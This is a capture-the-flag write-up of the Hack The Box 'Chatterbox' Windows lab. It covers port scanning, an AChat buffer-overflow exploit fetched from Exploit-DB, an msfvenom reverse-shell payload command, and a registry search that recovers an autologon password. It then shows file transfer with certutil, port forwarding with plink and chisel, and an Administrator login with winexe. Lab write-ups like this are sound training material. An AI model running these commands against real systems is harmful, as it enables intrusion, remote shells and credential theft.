Hackthebox - Chatterbox

  • Windows


└─# nmap -T4 -A -p-              
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 07:47 EDT
Nmap scan report for
Host is up (0.022s latency).
Not shown: 65524 closed tcp ports (reset)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp  open  http         AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp  open  achat        AChat chat system
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h22m42s, deviation: 2h18m34s, median: 5h02m41s
| smb2-time: 
|   date: 2022-04-02T16:51:53
|_  start_date: 2022-04-02T16:29:48
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Chatterbox
|   NetBIOS computer name: CHATTERBOX\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-04-02T12:51:52-04:00

TRACEROUTE (using port 23/tcp)
1   23.16 ms
2   23.35 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.78 seconds

Initial access


  • With some research on this program it seems to be a buffer overflow, there's an exploit made for it here

  • Let's get the exploit on our machine wget https://www.exploit-db.com/raw/36025

  • We just need to change the payload and do this instead because we want to get a reverse shell (not launch calc as the exploit payload is doing):

msfvenom -a x86 --platform Windows -p 'windows/shell_reverse_tcp' LHOST= LPORT=1234 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
  • Now we can replace the buffer in the exploit script with our buffer, we also need to change the server adress with the ip of the target

  • Let's get the user flag

cd C:\Users\Alfred\Desktop
type user.txt

Post Attack Enumeration

  • systeminfo

Host Name:                 CHATTERBOX
OS Name:                   Microsoft Windows 7 Professional 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00371-222-9819843-86663
Original Install Date:     12/10/2017, 9:18:19 AM
System Boot Time:          4/2/2022, 12:29:38 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,574 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,643 MB
Virtual Memory: In Use:    452 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\CHATTERBOX
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection 4
                                 DHCP Enabled:    No
                                 IP address(es)
  • net users

User accounts for \\CHATTERBOX

Administrator            Alfred                   Guest                    
The command completed successfully.
  • net localgroup

Aliases for \\CHATTERBOX

*Backup Operators
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Remote Desktop Users
The command completed successfully.
  • netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP                LISTENING       664
  TCP                LISTENING       4
  TCP              LISTENING       356
  TCP              LISTENING       716
  TCP              LISTENING       904
  TCP              LISTENING       456
  TCP              LISTENING       1032
  TCP              LISTENING       464
  TCP              LISTENING       4
  TCP              LISTENING       3100
  TCP              LISTENING       3100
  TCP        ESTABLISHED     3100
  TCP    [::]:135               [::]:0                 LISTENING       664
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       356
  TCP    [::]:49153             [::]:0                 LISTENING       716
  TCP    [::]:49154             [::]:0                 LISTENING       904
  TCP    [::]:49155             [::]:0                 LISTENING       456
  TCP    [::]:49156             [::]:0                 LISTENING       1032
  TCP    [::]:49157             [::]:0                 LISTENING       464
  UDP            *:*                                    872
  UDP            *:*                                    904
  UDP           *:*                                    904
  UDP           *:*                                    1104
  UDP        *:*                                    4
  UDP        *:*                                    4
  UDP       *:*                                    3384
  UDP       *:*                                    3100
  UDP      *:*                                    3384
  UDP         *:*                                    3384
  UDP        *:*                                    3384
  UDP    [::]:123               *:*                                    872
  UDP    [::]:500               *:*                                    904
  UDP    [::]:4500              *:*                                    904
  UDP    [::1]:1900             *:*                                    3384
  UDP    [::1]:59444            *:*                                    3384
  • The established connection is my reverse shell

  • On the top we see some local port that open including 445 which is smb so a share might be available locally

  • Let's check for passwords using this findstr /si password *.txt *.ini *.config *.sql - we do not seem to get anything

  • Let's try with the registry reg query HKLM /f password /t REG_SZ /s We get something interesting, we have a default password!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword    REG_SZ    Welcome1!
  • Let's check winlogon further

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ    
    LegalNoticeText    REG_SZ    
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    ShutdownWithoutLogon    REG_SZ    0
    WinStationsDisabled    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    scremoveoption    REG_SZ    0
    ShutdownFlags    REG_DWORD    0x11
    DefaultDomainName    REG_SZ    
    DefaultUserName    REG_SZ    Alfred
    AutoAdminLogon    REG_SZ    1
    DefaultPassword    REG_SZ    Welcome1!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
  • Let's try to use the password on the local smb, but first we need to do some port forwarding

  • We need to get plink in our attacking machine and transfer it to the target

    • wget https://the.earth.li/~sgtatham/putty/latest/w32/plink.exe

    • python3 -m http.server 80

    • In our target we browse to a directory where we have write access (Alfred's desktop for instamnce) and we get plink certutil.exe -urlcache -f plink.exe

  • We are going to launch ssh in our kali in our /etc/ssh/sshd_config PermitRootLogin should be set to yes PermitRootLogin yes

  • service ssh start

  • Now we can port forward smb with plink from our target machine: plink.exe -l root -pw your-kali-password-here -R 445:

  • For some reason I am not able to connect to my own machine using ssh so I gonna try with chisel

  • On my kali chisel server --reverse (it going to listen on port 8080)

  • On the target .\chisel.exe client R:445:

  • Now we can use winexe from our machine and connect with administrator using the discovered password winexe -U Administrator%Welcome1! // "cmd.exe"

  • And we can grab the root flag

Last updated